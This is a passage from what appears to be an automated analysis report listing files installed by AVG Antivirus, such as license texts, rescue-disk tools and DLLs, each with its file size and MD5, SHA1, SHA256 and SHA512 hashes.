                                                                                      7a9460def676dec00affda16aba1e93f0fb26f74

                                                                                      SHA256

                                                                                      a9c42b959825bce9b7c72a7b0797a41580cb21f407b73e08168fb1ed1db438c4

                                                                                      SHA512

                                                                                      6cbcc440792e05c8b73755acb329e2961a1991b730fc468d7483b1c005bdc664271237de634c3a1969967f8feea03b36ee8d2dd58e94dc61f553c4d728ff9d2e

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\nghttp2.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      ae3f3d4fd356269cb456df973156650f

                                                                                      SHA1

                                                                                      4f58ec889575f422dfe25fe14f22eeb5d009a4c9

                                                                                      SHA256

                                                                                      d0a9c5d1e40d1179f0669bd93e079a518b3067fad240410804170f05d1ba04b6

                                                                                      SHA512

                                                                                      ac1c0e7d7020f7ae091bb53e4b5d1afa8e9a669bbed4f7a418b8cb9975eace1c8c6eaa840f1248ea4f607f87ba8765d61ea0f05fc0e586ee21275633c8f1c3c8

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\protobuf.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      ce79a5e699943b3a132c0deba1777ac6

                                                                                      SHA1

                                                                                      57919d5bf210193d05ba496a870832582f475559

                                                                                      SHA256

                                                                                      f4df8b2457697851385d9ebb93267832c1dfa24e0e61881952f6b0c452663dc9

                                                                                      SHA512

                                                                                      82cda6f61e3dff94228d3eefe4e1f65dc483aca9c8597e482c1d6584d2f70ab7327af6461080447649dc4986b9932025dbcae5c078a2dbcca82c3a985d118f4c

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\pugixml.txt

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      ae1fcfd0aa84b946bb9fc04ba39dafcf

                                                                                      SHA1

                                                                                      e1391ab3bcdbdd0fb6e9169ffa1d72c1650f839e

                                                                                      SHA256

                                                                                      e9c108afa89f5f9ef50484bb1c64a8d07d0c0bfce171df01840702ceeaec1e34

                                                                                      SHA512

                                                                                      bb9635487def64130a10ec3cd4106e5018ce17d9b979124d9f6674ab1fc7fa549c32c0602aead88cfa78f6900ada5a1776995fe4b864b466d6dfbf1cb53d942e

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\rapidjson.txt

                                                                                      Filesize

                                                                                      4KB

                                                                                      MD5

                                                                                      cff54e417a17b4b77465198254970cd2

                                                                                      SHA1

                                                                                      a2922ac9caf1914313d4117dd30f4f1de71c5e14

                                                                                      SHA256

                                                                                      60ab263d1868282cb8262199edf648c21e45b729a78c6768bc9c27214a673da0

                                                                                      SHA512

                                                                                      a8cbf26c8babcf722623a709d5810baff798448a969000c36bfb7570d6ad388220066973783d7e162c1968fc42d0418a1c7ae15f51eea2ef2a2e843fdd9cddfb

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\sqlite.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      bdc36270610932ff0c405f7dbec4f1aa

                                                                                      SHA1

                                                                                      36ef609b122ccde100fa096a4703f3433af6e2d1

                                                                                      SHA256

                                                                                      8c109e1d8394fd4557d916d75ef61fb406319106cbeab77736d7c666befd1ab6

                                                                                      SHA512

                                                                                      83f1346cbc0d4e49b0e4cc338fa12813661eafb00acba39d350e28c54c86d6d19317545dddae562763e6794e5268731cf4d1d8f24db42a0cf8d9ab9165970beb

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\unrar.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      7cf65040f98baf1ba15f488d76f31e6a

                                                                                      SHA1

                                                                                      c9e9e12d8d124bdc38b63a1c832bf36890ddf046

                                                                                      SHA256

                                                                                      64578d53633622b31d19024184265f01d045b637da98fbd15ca81e39acfba63f

                                                                                      SHA512

                                                                                      4ffb42ad75204da6a288aa2d748754eab2a94386c33c9981ab1edb6f848e02fbe4590baafd81f5349a4c09bb913aedd7f57d49c43d96b8ad6e63c0e44d0a8ca1

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\vxWidgets.txt

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      7c3860ffbb2e3df660f4762e02a28a4e

                                                                                      SHA1

                                                                                      9a689135294896040420ead4e5a05038d0ce8cbc

                                                                                      SHA256

                                                                                      803b8b5aa4151030221b3c3f71a645da6241938421e49901444a79e5cca75fa8

                                                                                      SHA512

                                                                                      393e4077221420b1a1d73cb1d89ad264b65e36dde03271959699260e8305ff8715ab1a7535c356f2bf961f316ccb1ef1ff6e13da1708e7b53a9b6e12ad7066d0

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\xmlParser.txt

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      a3e6629906286395714e96dc4ac8edf4

                                                                                      SHA1

                                                                                      e1faf4917a367e29be497afc8ca14bb7b4493efe

                                                                                      SHA256

                                                                                      bdd96967d9b60683a91e086651ec03eed0d4ba142b37993111a0b1a608f8a05d

                                                                                      SHA512

                                                                                      c9be16142c2d45b9e81b2e33840b58837eabf94b3659cbce65e18d1501ac85cfa35fa087a467cbd55d633f1dfe370e61abeda2ed1e6db4e8b65826b7c41a4ccb

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\xxHash.txt

                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      06cdee91812ddfaf4cf3916f7a5309c4

                                                                                      SHA1

                                                                                      00397115d379f863279d13e823d33ed9c8b51be4

                                                                                      SHA256

                                                                                      7a9555c822ed30fcbf6832004edac893ba10bbcdb8e12d9a3662ddf1b52bd6e7

                                                                                      SHA512

                                                                                      cf22a889618b15fd40dd82809c2c8f5003fd40236798d8738fd3c56cf0f27b52e4157f834e5339bf12388dedb96eab1dc3e9d01968e1a4aa155e60cea9c96694

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\yara.txt

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      4bf27a810f9a1f9e7c76b029b3b457cc

                                                                                      SHA1

                                                                                      8edff1174e110de6aec218a8d9ac56dbea27a1e9

                                                                                      SHA256

                                                                                      1e5a5eae04b378d12f93a3acf56dfdcac7005bdd67fe22d71c855f4e994e9928

                                                                                      SHA512

                                                                                      d818fe6f1905f46445fdbed9ea63751441fdd69651ac532aae946181fc28da8d2aac98146fb507d3df9720b24dcd2f05a20735f32e113503253fd85defa2870e

                                                                                    • C:\Program Files\AVG\Antivirus\Licenses\zlib.txt

                                                                                      Filesize

                                                                                      982B

                                                                                      MD5

                                                                                      8041053262bc492837749777c930a791

                                                                                      SHA1

                                                                                      e8cbe20136c6d1627d40932dc4398d2053be5228

                                                                                      SHA256

                                                                                      d988d5362ea432d8c8ad9f05af876ba9409eb1ebad8c34b899fc9cc8c7ea5311

                                                                                      SHA512

                                                                                      0f321a821b1ab36a5e60a5d5e94dc26564a2cb03347b54279b5530f7b50ab3105d537637f338553dfc4ef800d28be103ab0ca50f77da3b4627fb6d7c558bd3ea

                                                                                    • C:\Program Files\AVG\Antivirus\RegSvr.exe

                                                                                      Filesize

                                                                                      3.8MB

                                                                                      MD5

                                                                                      c1e680f4e968db91715e567573c59825

                                                                                      SHA1

                                                                                      444a65f1ee79a10edb5440817f6943b94462e7af

                                                                                      SHA256

                                                                                      7a55a8312cd232de8d1b7bb3a61aae1d7efcbf46b833036bd232023cbb2f70d8

                                                                                      SHA512

                                                                                      fc2a4020e07e3e5c3aa512dc147a689f5c1bd18d7a1642fd738b8d6f479645ec61814a6277c992eee9da278ece944116cb0df86d28d86883a1562b6441595f7e

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\aswPEAntivirus.exe

                                                                                      Filesize

                                                                                      10.7MB

                                                                                      MD5

                                                                                      c4a23c728a4b0dc406f5e4a46a310dbb

                                                                                      SHA1

                                                                                      239a9e6defe152ddfc3a34c42af560369bdc1e82

                                                                                      SHA256

                                                                                      68cbe54cd2eece9e781202d91223ae712b0405d1f310b5a3a1c82ba59f8c1726

                                                                                      SHA512

                                                                                      8dc1dd87870dc9831c0e473ed2745eed1538c7cd4661a217dc5837d451f8cb50d43c5cd78a26dcca18152d279553ffaf0dc1802d95d55941d9841f4f7d7bcfc5

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\aswPEBrowser.exe

                                                                                      Filesize

                                                                                      3.2MB

                                                                                      MD5

                                                                                      3a2348b3cd47de8b6dd7abcfb46f5ee9

                                                                                      SHA1

                                                                                      68e29b31b9cd0bd86f6f7bde1ef7f48bd9d91090

                                                                                      SHA256

                                                                                      56d5d3920bab44c978131a4f7740ca8ff17c6653ed35988ffefb55c0b85c3aa4

                                                                                      SHA512

                                                                                      3300c81ff212716552e88016d75ae94fa4fa9480147d0ede44b21324d71412a5042d1d39fae8b835e527ee9619ece897f166e4e10f261ede401910c0df79a966

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\aswPECommander.exe

                                                                                      Filesize

                                                                                      3.0MB

                                                                                      MD5

                                                                                      4558e3a18849ea1ef71c652e15827415

                                                                                      SHA1

                                                                                      8e4315cb8bf99ed6309c323ab324c6066342a05a

                                                                                      SHA256

                                                                                      67411ab5b14ccab66e3e6c3daae0c58f5e8f71fab151ff51b0e9d07884dfc0ed

                                                                                      SHA512

                                                                                      76920aefb7c4142c96d614a894d3fa45a8daa6500af5f4ad39f50a42360dc39201b71d0f211bb8a052f68f3b794c918ad999f2aaccc3112c86c56239fea52dfc

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\aswPEShell.exe

                                                                                      Filesize

                                                                                      3.2MB

                                                                                      MD5

                                                                                      207d521f9113daf47fb79f8054e91d83

                                                                                      SHA1

                                                                                      38924812a0f8e3b55f183c83155b3a6dfbd6c3c2

                                                                                      SHA256

                                                                                      30ec7fceb08820b4ab173359846ed3e62d2c57584cfaeadf143233f08e9b2df1

                                                                                      SHA512

                                                                                      61d89cfd89df1744cb4a2d549e82ad17678e3996505828eefefacbd2f250bdcd4cba1bfa3c48f84dd43bdf34c8cf5d3bbede85aa0e2a6bdd2b8f920bf44a45b1

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\aswRegLib.dll

                                                                                      Filesize

                                                                                      319KB

                                                                                      MD5

                                                                                      975b73de2b5e38806bc7d07aca49b8f0

                                                                                      SHA1

                                                                                      776994621462020da5cf86afb1416ac80047cf9e

                                                                                      SHA256

                                                                                      89908fdea2a08c5d9dad24a011490872e234998489fc54588a5dc8fd83756e7b

                                                                                      SHA512

                                                                                      b5e589475a7190342036e4d84f09280516ee9f5bca4bb8cbf5fe1eef6bf35a30f970d7ea16bb879f1b0ae7b5b7c0ad8a29483343b702540d4b84911b10ebec96

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\aswShMin.exe

                                                                                      Filesize

                                                                                      305KB

                                                                                      MD5

                                                                                      c30fe640386274b2edadad9ef9f86a80

                                                                                      SHA1

                                                                                      18377c748b0b5712712a89062bcc382851461e66

                                                                                      SHA256

                                                                                      7ae87eeb8a7b294f5f020c6605d614e80635ef60f699e8b087d14bab99d4ea4b

                                                                                      SHA512

                                                                                      1e094ebf7cf7d988a7023ec929fbd2b5a73663873eab873dae45a6526c2d722b560d5724767715f03f907203afbc31bbda342679d9b971ae960795b19b3331c4

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\background-loading.png

                                                                                      Filesize

                                                                                      647KB

                                                                                      MD5

                                                                                      ead968e4266725709fc170ebd749f760

                                                                                      SHA1

                                                                                      bf99c488beaceff8ecf7734bf1a9fb481d3ec434

                                                                                      SHA256

                                                                                      5f0799aa26c5ee902f26875c02bf0ca3cc884e0a2722dfad89624659e03c4b9c

                                                                                      SHA512

                                                                                      cfa46409bf381e4c52e35c9f2369b9b4f377ec68c62609829992b9bd46e440c66643a8b457a98834336d1ce3c7828fbeb9c2ccb4b9ddfb75ad2b74d77702df6f

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\background.png

                                                                                      Filesize

                                                                                      644KB

                                                                                      MD5

                                                                                      d681f59276007a55650501ca31715f8e

                                                                                      SHA1

                                                                                      5156ede5ffbd33946dcc2b23b2c1d53e8e7bf702

                                                                                      SHA256

                                                                                      f800f6f5e01405b463ed0cf798029354c405fa54c0d8da59cdcf38a2ce9d73ab

                                                                                      SHA512

                                                                                      c1be5415b87fe1c97dd1315035034815c1cb4eb08f71c2e0e9141eae7628d25045829330207fe4cd745e3e42bdb77cff7db09cf0e2e982665b59a7493f026d6b

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\waikamd64.mst

                                                                                      Filesize

                                                                                      3KB

                                                                                      MD5

                                                                                      ec82d1081d31554e75d7e72b30d31d78

                                                                                      SHA1

                                                                                      ff5615640cda8cec9fb0ad3fb8a4e441bcc8e398

                                                                                      SHA256

                                                                                      0823905ce46355fe514ed547d5c639af39b2b3d28a5bcabd1846997c7a4208b7

                                                                                      SHA512

                                                                                      2f36323db92f1c1d4e3b8f18f8258830a6200bc7061eaaeadcd0a655e30276592376fa4c4f706f497d5fcd00a1e5c5649e20407d3860910a184ccbe4b36547b9

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\wxbase315u_vc.dll

                                                                                      Filesize

                                                                                      3.0MB

                                                                                      MD5

                                                                                      6be3312340beb58df3c490f717ec4b36

                                                                                      SHA1

                                                                                      1e45f5d386260d8a232e7c990802db2c3c2fa233

                                                                                      SHA256

                                                                                      19bb793140d369fdc1e94e79aad0afe90a442eeaa4945b978232b86254b38642

                                                                                      SHA512

                                                                                      a1aa942bbfd3773f7ec1ce027f6f9a7296711bf27f96eb4a5398bd9fb510fe95ff9bd00f41d767b3982a2fd1bd1442368241e6e336c1249a030c31e6535d30e5

                                                                                    • C:\Program Files\AVG\Antivirus\RescueDisk\wxmsw315u_core_vc.dll

                                                                                      Filesize

                                                                                      9.2MB

                                                                                      MD5

                                                                                      2242fcc9038b6751388ea5c3d3fe7c4d

                                                                                      SHA1

                                                                                      7bee974f4573d2e718e6b3274b59b054ed89d847

                                                                                      SHA256

                                                                                      bf6ddc8da511cb35e7390d35072db0c4a1d1d4504adc1d669482d0f826831646

                                                                                      SHA512

                                                                                      fe9c31bdb5a029268bcadfc260408bf39565ed7c20957ef5ee87c8b094f80757038e2a4ac6654fbbea0e1bc68ed576fd94d2697d1811d5d6dc96f1cdda80f8d2

                                                                                    • C:\Program Files\AVG\Antivirus\SecurityProductInformation.ini

                                                                                      Filesize

                                                                                      104B

                                                                                      MD5

                                                                                      3e592b3d4730c4c6c78d660ae176b809

                                                                                      SHA1

                                                                                      9242cb8d60d9dc6571d1494bae8d66408742bfa3

                                                                                      SHA256

                                                                                      72b2765f888e41d931929820735d2f57cf930617034968ccdb7dca72d12e50e8

                                                                                      SHA512

                                                                                      e2209ae2f63fb83454b2cffa99be8080f27605a4069e31a380aef01da4e17a14b5bba14adf7659bfc523535a155fad03e5d28c12e3b718daa7e6325e65958f49

                                                                                    • C:\Program Files\AVG\Antivirus\SetupInf.exe

                                                                                      Filesize

                                                                                      3.9MB

                                                                                      MD5

                                                                                      25d45d8946356f178fc8d1dca04f9b8d

                                                                                      SHA1

                                                                                      d8db54465bd804eb8859f22ab72490a02e97f591

                                                                                      SHA256

                                                                                      e294c5dbbaa09eaa5f118f16b118e739349f01c58fe37b8e969a131aace61dc9

                                                                                      SHA512

                                                                                      79928ec738e27c92b22a61f2f73805b4ac11e741a5badc0ed0f49057c77fc46f982957e845942d68db405d164a08358c267982f2ef54df8f97ebe1e0bbc9debb

                                                                                    • C:\Program Files\AVG\Antivirus\SupportTool.exe

                                                                                      Filesize

                                                                                      8.8MB

                                                                                      MD5

                                                                                      e942ee908eec5ee3b3e9d4ae808b9700

                                                                                      SHA1

                                                                                      266be568e3c82ba4751ec3698c069b3641baa861

                                                                                      SHA256

                                                                                      2c66f792d3198ca248a70e93b7f0f506a48d097998296970963d2cf623f8c990

                                                                                      SHA512

                                                                                      5b8d50a671132fb8a66a2bc3d1a8843ba2e35026fff8a7e74fabf6c25091f90cfd2c2ab732e75e489387fd756a48f61e7fbe8cfd9356760413be89f21d0bcd7b

                                                                                    • C:\Program Files\AVG\Antivirus\TuneupSmartScan.dll.ipending.33edda96

                                                                                      Filesize

                                                                                      12.9MB

                                                                                      MD5

                                                                                      161e4240884ff15d3ffdb57c93e18ff1

                                                                                      SHA1

                                                                                      e6e582e3ee4b96aeb0d06633a656e072bfd1067a

                                                                                      SHA256

                                                                                      d1519ec29ffe2135c545fde2566b02739437e474c728d52a38eca8fbfc9fd527

                                                                                      SHA512

                                                                                      72bb71c5b287cb4f6e6a5966a3058b5c7f215108e43b5f0f9c77eb55e145405bc5be798444bd38202b0c5713abe2455a10dd7707c4adad2cdcf239f9734a75ee

                                                                                    • C:\Program Files\AVG\Antivirus\VisthAux.exe

                                                                                      Filesize

                                                                                      516KB

                                                                                      MD5

                                                                                      25b0965594bf357d498a8dfb203e27e6

                                                                                      SHA1

                                                                                      3fbf98e45984df7573d50ca4b0983c91fed1160d

                                                                                      SHA256

                                                                                      943817e563369344ea4a164f5655766cb19551402dbf87d833e11c2dd0ccef3d

                                                                                      SHA512

                                                                                      96e1e27cb4cbf158013be1e1e1d399ea62b43e4feab7a3876b0e512394d4654ef24f800246ae9609ca9d512db54cdcba1cb1f23075dee78ff5eaacf9497d5b7b

                                                                                    • C:\Program Files\AVG\Antivirus\afwCoreClient.dll

                                                                                      Filesize

                                                                                      781KB

                                                                                      MD5

                                                                                      2e7ff52254d46c8cfd67fff72f610dea

                                                                                      SHA1

                                                                                      c6e5bda7fd29d8a48655b6abc168a5a50ec89103

                                                                                      SHA256

                                                                                      6de73cfac923f1c1d0c0d1957f312fd247af87eeb183c718cd01e11f2b320e21

                                                                                      SHA512

                                                                                      50bffd120a7e03340dbcecdf9d7687e9a4718e18930789a8464ed62ff66ecd575793bb1398b81f11990c59c0df13b60073cd14284b50fd042ae4c5161d86dfd8

                                                                                    • C:\Program Files\AVG\Antivirus\afwRpc.dll

                                                                                      Filesize

                                                                                      381KB

                                                                                      MD5

                                                                                      984dae4ad0963b7be5bc7ff79f083c57

                                                                                      SHA1

                                                                                      4770b508b777d40ae397cf7f43043198703b911d

                                                                                      SHA256

                                                                                      f7c919f7c6749c8ff5f0468a9cb30522720e34696cfefc6e69e3ce4d8fa9b3ff

                                                                                      SHA512

                                                                                      d41fd6b55a80dc5093822030795783705068470426e8d4a1c33ca4a6407a4eaf95d5c5684fb22e0933bf9140621193576ef334e6ba0f1c4f9125948c77d27010

                                                                                    • C:\Program Files\AVG\Antivirus\afwServ.exe

                                                                                      Filesize

                                                                                      2.2MB

                                                                                      MD5

                                                                                      bb5bd960646106a2a62923190a6f235e

                                                                                      SHA1

                                                                                      9273b1b87ae94778aa59e7af4899f376f531c035

                                                                                      SHA256

                                                                                      cf7adc1a10a3193e8ebfd0d8f12ff6b2c2a3f9673717984c896883947764d93e

                                                                                      SHA512

                                                                                      91b98dba3c4da387e6a92c1f737bf37432e280b7245f97e94911a70b7bba28cb9137709fa1ce6515024acbc798b6864fef9c1e16326159b7f4bec418da5bf2d0

                                                                                    • C:\Program Files\AVG\Antivirus\anen.dll

                                                                                      Filesize

                                                                                      1.8MB

                                                                                      MD5

                                                                                      22237f615214cac887889975fa53633c

                                                                                      SHA1

                                                                                      7b96c155a21a5ab55c63b9b1e7ebd2c26ee98bcc

                                                                                      SHA256

                                                                                      4fc3eaadab16c241c1aefb5ee64c9d9726fe83e4561189a899b7622df2197321

                                                                                      SHA512

                                                                                      1fea0c62162b7d52ed6019dedf95dd73403508a8a66b787ee99429b640f07725f6b9bf48241c9abde6057cd235ee0410df2c7931e8ca6a5b136538e48673142f

                                                                                    • C:\Program Files\AVG\Antivirus\asOutExt.dll

                                                                                      Filesize

                                                                                      3.5MB

                                                                                      MD5

                                                                                      69c5a7dc3e73e84fb6d7a0d314f39534

                                                                                      SHA1

                                                                                      b035c3af35d0600f335638c666b75b2bc60e7f52

                                                                                      SHA256

                                                                                      f5d87b1151339bc7a12666ae41b50a060242004bddfb9c76e7aeb9db191c73e1

                                                                                      SHA512

                                                                                      5401506889a4a4443e4a9a431512adc827fc7125a3528da57b068fd48081759a1448b6c7585e491bc7e34a01ccc82b53a4ca48b0e806e9f3365cfc54c3e5ab21

                                                                                    • C:\Program Files\AVG\Antivirus\ashBase.dll

                                                                                      Filesize

                                                                                      784KB

                                                                                      MD5

                                                                                      82d18097c0dd2a78ff1ba4258166260c

                                                                                      SHA1

                                                                                      5e3bf5ceb63b8ff181fcedeb1d1aa6f26dac5ef5

                                                                                      SHA256

                                                                                      324c2e71f19af9217c41a8deedcc2bb38477e9b6c459de25be0e6f70c745568f

                                                                                      SHA512

                                                                                      881ab179f014669ea47c2eeb0c2943ecd9430412d43ec8a43717ea41cb4347710bbe4c88c4b5f60516e6c3c341632bd4f9a51b0520d2087db93fde6b2469b025

                                                                                    • C:\Program Files\AVG\Antivirus\ashQuick.exe

                                                                                      Filesize

                                                                                      554KB

                                                                                      MD5

                                                                                      048449d6f09e283977b8fb2bcd834a4e

                                                                                      SHA1

                                                                                      9f118bc14d94929b10da1764a5753b4a56ac6c6a

                                                                                      SHA256

                                                                                      326bb1935246d312c38115a62b8bde365fce915c8083f28ca5a018848442a78c

                                                                                      SHA512

                                                                                      fb4f86d8882c0784b3460a30da3ec057fc2d88e2038b7ceb1a19a4e8f43c2824c2c30a70c7f091bf4f260269ab092251e0b417ec3dab7659e920b6d623368d21

                                                                                    • C:\Program Files\AVG\Antivirus\ashServ.dll

                                                                                      Filesize

                                                                                      20.2MB

                                                                                      MD5

                                                                                      5e79a1a0135d94484c3b9336983fbe66

                                                                                      SHA1

                                                                                      63b470a3548fb5beee9d68d560aac019c5ad0198

                                                                                      SHA256

                                                                                      6b41eb60312b7fe33aabc81fdbf373b661071234e1f95882e6df5bd004f8d4a9

                                                                                      SHA512

                                                                                      69fb2d454d38e5859b32b2551415ff0ca6eeca77624b799df6e089f965ab78bf0ef49a10293abc17dd17f6473e9485ab85bc511f741086cac1e3f4705809bd09

                                                                                    • C:\Program Files\AVG\Antivirus\ashShell.dll

                                                                                      Filesize

                                                                                      3.7MB

                                                                                      MD5

                                                                                      7a690d46fa0a743025ea0583a3b31389

                                                                                      SHA1

                                                                                      c466bbe9498abaa56cc6e07fc19affbf3eae7e27

                                                                                      SHA256

                                                                                      3ff1f6e523047e52a9ddee1d68739be726db7f49493963b4ed4428bf2fee80ce

                                                                                      SHA512

                                                                                      55c6d585b71c0f8fc5222565db4b7473278f535d4172076d510bffb86fd98e18c977e9340906936aa252ff90ef0a5d4b933e1230c4d525b279706f575217d303

                                                                                    • C:\Program Files\AVG\Antivirus\ashTask.dll

                                                                                      Filesize

                                                                                      1.3MB

                                                                                      MD5

                                                                                      ff518d1c032a950103288feb849fe282

                                                                                      SHA1

                                                                                      93ba2baa1e2c05624190eb2661e66f595e126fef

                                                                                      SHA256

                                                                                      2ab7d101db564a21275bff9e365fca87aff2c942301dc91b842df385829ec9c5

                                                                                      SHA512

                                                                                      60b115d41cdac07490b9865184ceda90b4da592ca2376df98063b6cdedb0326006125bb933a4c93ecd28fb3a318b4a2c77bd51f698180d5b50ff10f57ee24a0a

                                                                                    • C:\Program Files\AVG\Antivirus\ashUpd.exe

                                                                                      Filesize

                                                                                      680KB

                                                                                      MD5

                                                                                      fc192914884bbbf095390dbef66943c7

                                                                                      SHA1

                                                                                      32e7de07501f389f6c7e8d2ff1e4b30b9dccf68f

                                                                                      SHA256

                                                                                      de5792b9efefaf1b8d9c7ecbfda91050b183c431e9aab71fff5fb89489220831

                                                                                      SHA512

                                                                                      04a0ee17699acdcdd02c8d9e51b5a330ed9113f2d29303c8796bc014d3db25c7d690bdb653ff217f067206e99289fc320112ff993f17c9ba7c625ead3bf0da0a

                                                                                    • C:\Program Files\AVG\Antivirus\asulaunch.exe

                                                                                      Filesize

                                                                                      266KB

                                                                                      MD5

                                                                                      e53a3f7fe9a73cb2d2861b0d2434c7d5

                                                                                      SHA1

                                                                                      2d790e1601f4ca919a6378b2dc6d708f7c0f7ce4

                                                                                      SHA256

                                                                                      28bc49c7e4ded78f4698df8cb1fa0b177ec0df24915f5eb389232ca68ad49368

                                                                                      SHA512

                                                                                      d8eebb039bc221d229705f6f022166b34308e3718aa1a73ae7cc8acd823cd9d223750b5d4c9ab4fe0eef8312fab64e7cb2e2d4c9ecea1b97f613cf06357a6571

                                                                                    • C:\Program Files\AVG\Antivirus\aswAMSI.dll

                                                                                      Filesize

                                                                                      912KB

                                                                                      MD5

                                                                                      0398e6038cce1804465acb9199a13d6f

                                                                                      SHA1

                                                                                      d55f1bf74f6724a0e54c15bf180b9f78de8cc595

                                                                                      SHA256

                                                                                      e2aefc3d0b496e73a05cacbf1aef5ab51c74deac676706f2f14647db3771430b

                                                                                      SHA512

                                                                                      0a2629f1d932ed05f4e78f715448fa1f31ee0f31bb0a2e79c05e38042e686d12044c50d0c96d9fcbd143d46a5c62898660e8c4ae58ffee399b8c17c945b284f4

                                                                                    • C:\Program Files\AVG\Antivirus\aswAux.dll

                                                                                      Filesize

                                                                                      1012KB

                                                                                      MD5

                                                                                      6cf99e9d9781019718cddb8bf7a84ed8

                                                                                      SHA1

                                                                                      df17c6c43c5f7a67a88af68775ce6fa36e9a0585

                                                                                      SHA256

                                                                                      6fc22d3b0e8ce84b96f9e6ad1296dbd86469713f361723f3cceacf1bc03c6281

                                                                                      SHA512

                                                                                      f33e010876476ca31fdfe90b0de99f89e74494f424c1bff7079f9c971b21e8fcf893e55ebac2efb89a7b9642aee9a1977ca8e9e3a92353c9e715f2de377ba974

                                                                                    • C:\Program Files\AVG\Antivirus\aswAv.dll

                                                                                      Filesize

                                                                                      21.8MB

                                                                                      MD5

                                                                                      44edcd87451993bc23c410654780879b

                                                                                      SHA1

                                                                                      3f2158c21f0b466d1aadb71a713cfd67286f0d47

                                                                                      SHA256

                                                                                      055227445baa1573b18b26daaf2790db5bbd725bace543aa120286e7a8163aea

                                                                                      SHA512

                                                                                      a22433d4cad83705e5b3dd075e7b3d9b9dabc5a264e696b6774855808ed6d426fda03e5b2f5f13fec0aa2d795bd9176179af958a6a5c54d77f06f84eb05d6ecb

                                                                                    • C:\Program Files\AVG\Antivirus\aswAvBootTimeScanShMin.exe

                                                                                      Filesize

                                                                                      1.3MB

                                                                                      MD5

                                                                                      ae44319e29a6b89be93432ef9acb5d06

                                                                                      SHA1

                                                                                      e170be94819f5d3920ad102bad25056dbefeb3dc

                                                                                      SHA256

                                                                                      b7dfb6bca07a290648e98cdac842c879bf8fba132aa4d4b95d463664cf44d2f9

                                                                                      SHA512

                                                                                      5d4ddaf09910a48490c5b6dc5eeedfaa71d82e1e794be5d1dda868c85b03d0b7ddef52e30e0fca13f4c59f590dd87d8935a2db50caf396808428272a064da67b

                                                                                    • C:\Program Files\AVG\Antivirus\aswBrowser.dll

                                                                                      Filesize

                                                                                      578KB

                                                                                      MD5

                                                                                      3a4dcc021712c980bc247317f4eaf8c6

                                                                                      SHA1

                                                                                      9c52966c170aebb25c6d0c47be870560a80fc9f2

                                                                                      SHA256

                                                                                      1077ac5c417faf8c457acf81d5c32b36438338c96f7c62116ac2bb164a81209e

                                                                                      SHA512

                                                                                      1b791b3e63b592cb7541a1c8526e7f4d03610a5a438a8a2f777469dc469dba1fcca59d24390cc003567158a13fc987c8f190d3c84c9b3cd41816645ecb4fa6fb

                                                                                    • C:\Program Files\AVG\Antivirus\aswChLic.exe

                                                                                      Filesize

                                                                                      334KB

                                                                                      MD5

                                                                                      cf7538c3443c4019ce17ce61088350df

                                                                                      SHA1

                                                                                      9e0997979f4a8899d31b733d4dac36df8f814170

                                                                                      SHA256

                                                                                      6ea343700b87b1de05bbecb162fa50f639328633a48ac841c552e5185927640f

                                                                                      SHA512

                                                                                      0ff8d6ed898b7aa1ef5ca93fb6edffb999775430968f0bcc274f4d0afd5c5172b19d596046f08a6f4657a66c8c00cf5ccd4f1da8df12e3fde85cbf8feefd0677

                                                                                    • C:\Program Files\AVG\Antivirus\aswCmnBS.dll

                                                                                      Filesize

                                                                                      430KB

                                                                                      MD5

                                                                                      245253c68742a6a201f0b60d2c98628c

                                                                                      SHA1

                                                                                      3898e2bf58d9edcc93bc1e63319dca5f9ae330e7

                                                                                      SHA256

                                                                                      40db3e79e0625b1e83186ae072293ca36e235af91fc92e0362a23489f47d7071

                                                                                      SHA512

                                                                                      ed54e750362859bfd35a63b49b199d9c9733f1fc8393165cfc125ec2ab108cc0c30108ff499915bfd19c3ece347556ec327979a6d9f790f0706a97eb2ffb1387

                                                                                    • C:\Program Files\AVG\Antivirus\aswCmnIS.dll

                                                                                      Filesize

                                                                                      477KB

                                                                                      MD5

                                                                                      0f31d7c2e0be6733de626acfed7f35e6

                                                                                      SHA1

                                                                                      e27217807c68c1f4baf0dcf383955ae7c6084997

                                                                                      SHA256

                                                                                      0a3c105aab903dab5fd7de27f1b3c20066a45697f8df43a0579c19bdd3a218ec

                                                                                      SHA512

                                                                                      a49d35bfa1a59658bbdc546ef2076bd1897ead84f9cbcfcb3d827331ff38763b90c13f5810f0e3434fad7a9e27d47cc3f9dabb4846485534beb1aa050cefe355

                                                                                    • C:\Program Files\AVG\Antivirus\aswCmnOS.dll

                                                                                      Filesize

                                                                                      203KB

                                                                                      MD5

                                                                                      e5ed7adc039f4f80fef92ac6153da673

                                                                                      SHA1

                                                                                      e295dd360947453cbf650b0283aec8cf5b0aac9f

                                                                                      SHA256

                                                                                      35de9e17c8dd3d3e41781e72a387766c1c8ce5cff2aed27584a4fab76bc4b6cb

                                                                                      SHA512

